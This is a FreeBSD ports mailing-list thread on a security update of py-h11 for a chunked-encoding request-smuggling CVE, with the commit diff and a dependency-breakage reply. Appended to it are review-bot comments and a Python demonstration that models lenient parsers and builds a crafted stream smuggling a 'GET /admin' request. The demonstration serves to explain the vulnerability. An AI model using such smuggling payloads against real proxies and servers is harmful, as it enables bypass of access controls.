List-Id: Commit messages for all branches of the ports repository
List-Archive: https://lists.freebsd.org/archives/dev-commits-ports-all
Subject: Re: git: 72eea8b95e0f - main - net/py-h11: Update version 0.14.0=>0.16.0
From: Moin Rahman
Date: Tue, 29 Apr 2025 16:51:20 +0200
To: Dima Panov
Cc: ports-committers@freebsd.org, dev-commits-ports-all@freebsd.org, dev-commits-ports-main@freebsd.org
Message-Id: <2C91E232-438D-4EAD-A4AA-9C3FCE4FD416@freebsd.org>
References: <202504291310.53TDATS0020455@gitrepo.freebsd.org>

Yes. I know that and I have also mentioned this in the commit log. The maintainer of httpcore has already been notified of the update off-list.

Kind regards,
Moin

> On Apr 29, 2025, at 16:49, Dima Panov wrote:
>
> Hello!
>
> This commit breaks www/py-httpcore (and consumers by chain)
>
> py311-httpcore-1.0.8 depends on package: py311-h11>=0.13<0.15 - not found
>
> 29.04.2025 16:10, Muhammad Moinur Rahman writes:
>> The branch main has been updated by bofh:
>>
>> URL: https://cgit.FreeBSD.org/ports/commit/?id=72eea8b95e0f73093217e00f999ff2e17e71db5a
>>
>> commit 72eea8b95e0f73093217e00f999ff2e17e71db5a
>> Author:     Muhammad Moinur Rahman
>> AuthorDate: 2025-04-29 12:52:42 +0000
>> Commit:     Muhammad Moinur Rahman
>> CommitDate: 2025-04-29 13:10:08 +0000
>>
>>     net/py-h11: Update version 0.14.0=>0.16.0
>>
>>     - This addresses the fix for CVE-2025-43859 — a critical vulnerability
>>       affecting HTTP/1.1 connection handling.
>>     - This update may break ports that depend on older h11 APIs, as some
>>       interfaces and behaviors have changed in the new release.
>>       Ports known or suspected to be affected should be tested carefully and
>>       updated accordingly. A heads-up will also be sent to ports@.
>>       Quarterly merge should take place after all the downstream ports have
>>       been fixed for building.
>> Security: CVE-2025-43859 >> Changelog: = https://github.com/python-hyper/h11/releases/tag/v0.16.0 >> MFH: 2025Q2 >> --- >> net/py-h11/Makefile | 3 +-- >> net/py-h11/distinfo | 6 +++--- >> security/vuxml/vuln/2025.xml | 29 +++++++++++++++++++++++++++++ >> 3 files changed, 33 insertions(+), 5 deletions(-) >> diff --git a/net/py-h11/Makefile b/net/py-h11/Makefile >> index 0772575e8580..ac937d9dc0a4 100644 >> --- a/net/py-h11/Makefile >> +++ b/net/py-h11/Makefile >> @@ -1,6 +1,5 @@ >> PORTNAME=3D h11 >> -PORTVERSION=3D 0.14.0 >> -PORTREVISION=3D 1 >> +DISTVERSION=3D 0.16.0 >> CATEGORIES=3D net python >> MASTER_SITES=3D PYPI >> PKGNAMEPREFIX=3D ${PYTHON_PKGNAMEPREFIX} >> diff --git a/net/py-h11/distinfo b/net/py-h11/distinfo >> index a002b81548d6..470f83ddf207 100644 >> --- a/net/py-h11/distinfo >> +++ b/net/py-h11/distinfo >> @@ -1,3 +1,3 @@ >> -TIMESTAMP =3D 1667662218 >> -SHA256 (h11-0.14.0.tar.gz) =3D = 8f19fbbe99e72420ff35c00b27a34cb9937e902a8b810e2c88300c6f0a3b699d >> -SIZE (h11-0.14.0.tar.gz) =3D 100418 >> +TIMESTAMP =3D 1745931106 >> +SHA256 (h11-0.16.0.tar.gz) =3D = 4e35b956cf45792e4caa5885e69fba00bdbc6ffafbfa020300e549b208ee5ff1 >> +SIZE (h11-0.16.0.tar.gz) =3D 101250 >> diff --git a/security/vuxml/vuln/2025.xml = b/security/vuxml/vuln/2025.xml >> index d5bbf0fb3f3e..46ce1f46c383 100644 >> --- a/security/vuxml/vuln/2025.xml >> +++ b/security/vuxml/vuln/2025.xml >> @@ -1,3 +1,32 @@ >> + >> + h11 accepts some malformed Chunked-Encoding = bodies >> + >> + >> + py39-h11 >> + py310-h11 >> + py311-h11 >> + py312-h11 >> + 0.16.0 >> + >> + >> + >> + >> +

h11 reports:

>> +
>> +

h11 is a Python implementation of HTTP/1.1. Prior to = version 0.16.0, a leniency in h11's parsing of line t erminators in = chunked-coding message bodies can lead to request smuggling = vulnerabilities under certain conditions. This issu e has been patched = in version 0.16.0. Since exploitation requires the combination of buggy = h11 with a buggy (reverse) proxy, fixing either component is = sufficient to mitigate this issue.

>> +
>> + >> +
>> + >> + CVE-2025-43859 >> + https://nvd.nist.gov/vuln/detail/CVE-2025-43859 >> + >> + >> + 2025-04-24 >> + 2025-04-29 >> + >> +
>> + >> >> Grafana -- Authorization bypass in data source proxy = API >>
>
> --
> Sincerely,
> Dima (fluffy@FreeBSD.org, https://t.me/FluffyBSD, @fluffy:matrix-dev.freebsd.org)
> (desktop, kde, x11, office, ports-secteam)@FreeBSD team
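Review bot: the Makefile hunk replaces `PORTVERSION= 0.14.0` / `PORTREVISION= 1` with `DISTVERSION= 0.16.0` but nothing else in the patch touches the ports that pin the old h11, and the thread already records the result: `py311-httpcore-1.0.8 depends on package: py311-h11>=0.13<0.15 - not found`. A security bump that leaves www/py-httpcore (and, per the reply, its consumers by chain) uninstallable gives those users neither the fix nor a working package; carry the dependency-bound change for www/py-httpcore in the same commit, or hold this one until the heads-up to ports@ has produced fixed dependents, which is the ordering the commit message itself demands before the quarterly merge.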
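Review bot: the distinfo hunk swaps in a new TIMESTAMP, SHA256 and SIZE for h11-0.16.0.tar.gz, but the commit log gives no sign that the digest was compared with anything other than the file `make makesum` happened to download. For a commit carrying a `Security:` tag, state in the log that the new SHA256 matched the digest published for the release linked under `Changelog:`, so the checksum pins a verified artifact rather than whatever PYPI served at fetch time.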
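Review bot: the vuxml hunk lists only the CVE id and its NVD page as references, while the commit message already cites the upstream release notes (https://github.com/python-hyper/h11/releases/tag/v0.16.0); add that URL to the entry so the advisory points at the fix directly rather than only at the tracker. The affected range ending at 0.16.0 is right for py39- through py312-h11; given that the description says fixing either h11 or the proxy is sufficient, double-check that the quarterly MFH does not ship this entry ahead of an installable h11 for the dependents the thread names.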
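The VuXML text quoted above gives the bug class one sentence: a lenient reading of line terminators in a chunked body lets a back end and a reverse proxy disagree about where a request ends. The following is an added example written for this page, not h11 code and not part of the commit. Its two lenient modes are constructed models of that class (a proxy that accepts a bare LF after chunk data, a back end that consumes two bytes after chunk data without checking them), not a description of h11's actual parser, and the attack stream, the `/admin` path and the header names are constructed for the illustration.

```python
"""Boundary disagreement in chunked transfer-coding, the mechanism behind
request smuggling.  Added example for this page; not h11 code and not part
of the ports commit.  The two lenient modes are constructed models of the
bug class, not a description of h11's parser.
"""

from enum import Enum, auto


class Mode(Enum):
    STRICT = auto()         # RFC 9112: CRLF required after chunk data (the fixed side)
    BARE_LF_OK = auto()     # constructed model of a lenient reverse proxy: lone LF accepted
    ANY_TWO_BYTES = auto()  # constructed model of a lenient back end: 2 bytes consumed unchecked


class ChunkedError(ValueError):
    """The body is malformed under the chosen mode."""


def _read_line(buf: bytes, pos: int) -> tuple[bytes, int]:
    """Return (line without CRLF, position after CRLF).  Size lines need CRLF in every mode."""
    eol = buf.find(b"\r\n", pos)
    if eol < 0:
        raise ChunkedError("incomplete line")
    return buf[pos:eol], eol + 2


def decode_chunked(buf: bytes, mode: Mode) -> tuple[bytes, bytes]:
    """Decode one chunked message body from the start of buf.

    Returns (decoded_body, left_over).  left_over is what a server would read
    as the start of the next request on the same connection.
    """
    pos = 0
    body = bytearray()
    while True:
        line, pos = _read_line(buf, pos)
        size_field = line.split(b";", 1)[0].strip()  # ignore chunk extensions
        try:
            size = int(size_field, 16)
        except ValueError:
            raise ChunkedError(f"bad chunk size {size_field!r}") from None
        if size == 0:
            # last-chunk: skip trailer fields up to and including the empty line
            while True:
                line, pos = _read_line(buf, pos)
                if line == b"":
                    return bytes(body), buf[pos:]
        data = buf[pos:pos + size]
        if len(data) < size:
            raise ChunkedError("truncated chunk data")
        pos += size
        body += data
        # chunk-data terminator: the only place the three modes differ
        if buf[pos:pos + 2] == b"\r\n":
            pos += 2
        elif mode is Mode.BARE_LF_OK and buf[pos:pos + 1] == b"\n":
            pos += 1
        elif mode is Mode.ANY_TWO_BYTES and len(buf) - pos >= 2:
            pos += 2
        else:
            raise ChunkedError("chunk data not terminated by CRLF")


def is_accepted(buf: bytes, mode: Mode) -> bool:
    """True if the body parses without error in the given mode."""
    try:
        decode_chunked(buf, mode)
        return True
    except ChunkedError:
        return False


def request_count(buf: bytes, mode: Mode) -> int:
    """Requests a parser in this mode sees in the stream: 1, or 2 if bytes are left over."""
    _, left_over = decode_chunked(buf, mode)
    return 2 if left_over else 1


# Constructed attack stream (not a capture).  The smuggled request is 62 bytes
# so that the proxy's 0x40 = 64-byte chunk ends exactly on a CRLF; the X-Pad
# header and the /admin path are arbitrary choices for the illustration.
SMUGGLED = (
    b"GET /admin HTTP/1.1\r\n"
    b"Host: app\r\n"
    b"Content-Length: 5\r\n"
    b"X-Pad: ab\r\n"
)

ATTACK_BODY = (
    b"5\r\nAAAAA"       # ordinary 5-byte chunk ...
    b"\n"               # ... ended by a bare LF instead of CRLF
    b"40\r\n"           # proxy: next chunk is 64 bytes
                        # back end: "\n4" is the unchecked terminator, "0" the last-chunk line
    b"\r\n"             # back end: end of trailers; proxy: first 2 of the 64 data bytes
    + SMUGGLED          # proxy: the other 62 data bytes; back end: a second request
    + b"\r\n"           # proxy: chunk-data terminator; back end: end of that request's headers
    + b"0\r\n\r\n"      # proxy: last-chunk and end of body; back end: the 5-byte body of GET /admin
)


if __name__ == "__main__":
    for mode in Mode:
        if not is_accepted(ATTACK_BODY, mode):
            print(f"{mode.name:14} rejected")
            continue
        body, rest = decode_chunked(ATTACK_BODY, mode)
        print(f"{mode.name:14} body={len(body)} bytes, requests={request_count(ATTACK_BODY, mode)}, left_over={rest[:20]!r}")
```

Run stand-alone, the STRICT parser rejects the stream at the first bare LF, BARE_LF_OK (the modelled proxy) sees one 71-byte body and nothing left over, and ANY_TWO_BYTES (the modelled back end) sees a 5-byte body followed by a complete second request starting `GET /admin`. That split is the whole attack, and it is why the quoted advisory says fixing either component is enough: a side that insists on CRLF never produces or consumes the ambiguous bytes.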